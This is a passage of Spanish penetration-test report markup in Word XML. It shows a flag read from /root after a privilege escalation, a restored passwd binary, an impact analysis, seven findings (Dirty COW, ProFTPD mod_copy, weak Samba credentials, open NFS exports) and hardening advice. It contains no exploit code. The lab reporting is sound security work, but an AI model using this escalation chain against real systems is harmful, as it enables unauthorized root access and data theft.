        <w:spacing w:after="10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Se leyó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/root/proof.txt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(reservado al administrador) y, siguiendo buenas prácticas, se restauró el binario modificado desde su copia de seguridad.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0B1020" w:sz="2"/>
          <w:left w:val="single" w:color="0B1020" w:sz="2"/>
          <w:bottom w:val="single" w:color="0B1020" w:sz="2"/>
          <w:right w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideH w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideV w:val="single" w:color="0B1020" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="0B1020" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="4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[root@fileserver tmp]# cat /root/proof.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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Best of Luck</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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af52e0163b03cbf7c6dd146351594a43</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240"/>
              <w:ind w:left="150" w:right="150"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="D7E6E5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">[root@fileserver tmp]# cp /tmp/bak /usr/bin/passwd   # restauración</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:bottom w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:left w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:right w:val="single" w:color="D4DAE6" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="30" w:before="10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5B6472"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 28 · Bandera capturada y entorno restaurado.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"/>
        <w:gridCol w:w="9200"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="160"/>
            <w:shd w:fill="E4477A" w:val="clear"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9200"/>
            <w:shd w:fill="FCE4E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line="26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203A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Bandera capturada  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3B2E5A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:fill="EEF1F6" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">af52e0163b03cbf7c6dd146351594a43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 — evidencia de acceso a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3B2E5A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:fill="EEF1F6" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">/root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, reservado exclusivamente al administrador del sistema.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1EA7A0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">09</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1EA7A0" w:sz="18"/>
        </w:pBdr>
        <w:spacing w:after="150" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Análisis de impacto (modelo CIA)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="14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El compromiso a nivel root implica la pérdida completa de las tres propiedades de la seguridad de la información.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="D4DAE6" w:sz="4"/>
          <w:left w:val="single" w:color="D4DAE6" w:sz="4"/>
          <w:bottom w:val="single" w:color="D4DAE6" w:sz="4"/>
          <w:right w:val="single" w:color="D4DAE6" w:sz="4"/>
          <w:insideH w:val="single" w:color="D4DAE6" w:sz="4"/>
          <w:insideV w:val="single" w:color="D4DAE6" w:sz="4"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="900"/>
        <w:gridCol w:w="2400"/>
        <w:gridCol w:w="1500"/>
        <w:gridCol w:w="4560"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="900"/>
            <w:shd w:fill="14203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14203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Propiedad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:shd w:fill="14203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4560"/>
            <w:shd w:fill="14203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</w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="900"/>
            <w:shd w:fill="14203A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A7A0"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
              <w:t xml:space="preserve">C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203A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Confidencialidad</w:t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E4477A" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve"> CRÍTICO </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Como root se puede leer cualquier archivo: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3B2E5A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:fill="EEF1F6" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve">/etc/shadow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, llaves privadas y todo dato almacenado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="900"/>
            <w:shd w:fill="14203A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A7A0"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
              <w:t xml:space="preserve">I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203A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Integridad</w:t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E4477A" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve"> CRÍTICO </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Se demostró la modificación de archivos del sistema. Posibilidad de alterar datos o implantar puertas traseras.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="900"/>
            <w:shd w:fill="14203A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A7A0"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
              <w:t xml:space="preserve">A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203A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Disponibilidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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F7941D" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve"> ALTO </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Root puede detener servicios, borrar información o cifrar el sistema (ransomware).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="90" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3B2E5A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">▍</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Escenario de impacto empresarial</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="14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En una organización real, un servidor de archivos comprometido así permitiría </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">robar toda la información corporativa, manipular documentos, pivotar hacia el resto de la red y desplegar ransomware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. Para un activo cuyo propósito es custodiar archivos, la pérdida de confidencialidad e integridad es especialmente grave.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E4477A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E4477A" w:sz="18"/>
        </w:pBdr>
        <w:spacing w:after="150" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Resumen de hallazgos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="14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Se identificaron siete hallazgos. La severidad combina facilidad de explotación e impacto, con un criterio cualitativo alineado con CVSS.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="D4DAE6" w:sz="4"/>
          <w:left w:val="single" w:color="D4DAE6" w:sz="4"/>
          <w:bottom w:val="single" w:color="D4DAE6" w:sz="4"/>
          <w:right w:val="single" w:color="D4DAE6" w:sz="4"/>
          <w:insideH w:val="single" w:color="D4DAE6" w:sz="4"/>
          <w:insideV w:val="single" w:color="D4DAE6" w:sz="4"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="760"/>
        <w:gridCol w:w="3200"/>
        <w:gridCol w:w="1300"/>
        <w:gridCol w:w="4100"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:shd w:fill="14203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shd w:fill="14203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Hallazgo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1300"/>
            <w:shd w:fill="14203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4100"/>
            <w:shd w:fill="14203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Recomendación</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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203A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">H-01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22A35"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Kernel obsoleto vulnerable a Dirty COW (CVE-2016-5195)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5B6472"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Impacto: Escalada a root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="13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E4477A" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve"> CRÍTICO </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Actualizar el kernel a una versión parcheada y reiniciar.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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203A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">H-02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22A35"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Credenciales débiles y reutilizadas (smbuser)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5B6472"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Impacto: Acceso inicial al sistema</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="13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E4477A" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve"> CRÍTICO </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Política de contraseñas robustas; cuentas únicas por servicio.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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203A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">H-03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22A35"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Exposición de /var/log por NFS y SMB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5B6472"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Impacto: Fuga de información sensible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="13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F7941D" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve"> ALTO </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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No compartir rutas del sistema; limitar recursos a datos de negocio.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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203A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">H-04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22A35"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ProFTPD 1.3.5 — mod_copy (CVE-2015-3306)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5B6472"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Impacto: Lectura/escritura sin autenticación</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="13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F7941D" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve"> ALTO </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Actualizar ProFTPD y deshabilitar mod_copy.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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203A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">H-05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22A35"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Export NFS sin restricción a toda la subred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5B6472"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Impacto: Acceso no autorizado a archivos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="13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203A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="F5C93F" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve"> MEDIO </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Exportar solo a hosts concretos, con root_squash y solo lectura.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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203A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">H-06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22A35"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">FTP anónimo y login local habilitados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5B6472"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Impacto: Superficie de ataque y vía de entrada</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="13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203A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="F5C93F" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve"> MEDIO </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Deshabilitar acceso anónimo y restringir usuarios de FTP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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203A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">H-07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color w:val="222A35"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">PermitRootLogin habilitado y banners de versión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5B6472"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Impacto: Facilita ataques dirigidos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="13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203A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="1EA7A0" w:val="clear"/>
              </w:rPr>
              <w:t xml:space="preserve"> BAJO </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Deshabilitar login de root por SSH y ocultar versiones.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="90" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3B2E5A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">▍</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Distribución por severidad</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="FFFFFF" w:sz="8"/>
          <w:left w:val="single" w:color="FFFFFF" w:sz="8"/>
          <w:bottom w:val="single" w:color="FFFFFF" w:sz="8"/>
          <w:right w:val="single" w:color="FFFFFF" w:sz="8"/>
          <w:insideH w:val="single" w:color="FFFFFF" w:sz="8"/>
          <w:insideV w:val="single" w:color="FFFFFF" w:sz="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4477A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CRÍTICO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:fill="F7941D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ALTO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:fill="F5C93F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4203A"/>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
              </w:rPr>
              <w:t xml:space="preserve">2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203A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">MEDIO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:fill="1EA7A0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4203A"/>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
              </w:rPr>
              <w:t xml:space="preserve">1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203A"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">BAJO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1EA7A0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">11</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1EA7A0" w:sz="18"/>
        </w:pBdr>
        <w:spacing w:after="150" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Recomendaciones técnicas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="90" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="E4477A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">▍</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prioridad inmediata (0–48 h)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rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Parchear el kernel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a una versión posterior a octubre de 2016 y reiniciar.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rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Rotar todas las credenciales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del sistema y Samba; aplicar política de contraseñas fuertes.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rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Retirar `/var/log`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y cualquier ruta del sistema de los recursos SMB y NFS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="90" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="F7941D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">▍</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prioridad alta (1–2 semanas)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rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Actualizar ProFTPD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y deshabilitar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mod_copy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; evaluar la necesidad de dos servicios FTP.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rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Endurecer NFS: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exportar solo a hosts autorizados, con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root_squash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y solo lectura.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rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Deshabilitar el acceso anónimo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de FTP y restringir qué usuarios se autentican.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="90" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3B2E5A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">▍</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Endurecimiento general (1–3 meses)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rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH: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PermitRootLogin no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, autenticación por llave y revisión de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="3B2E5A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:fill="EEF1F6" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">authorized_keys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rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
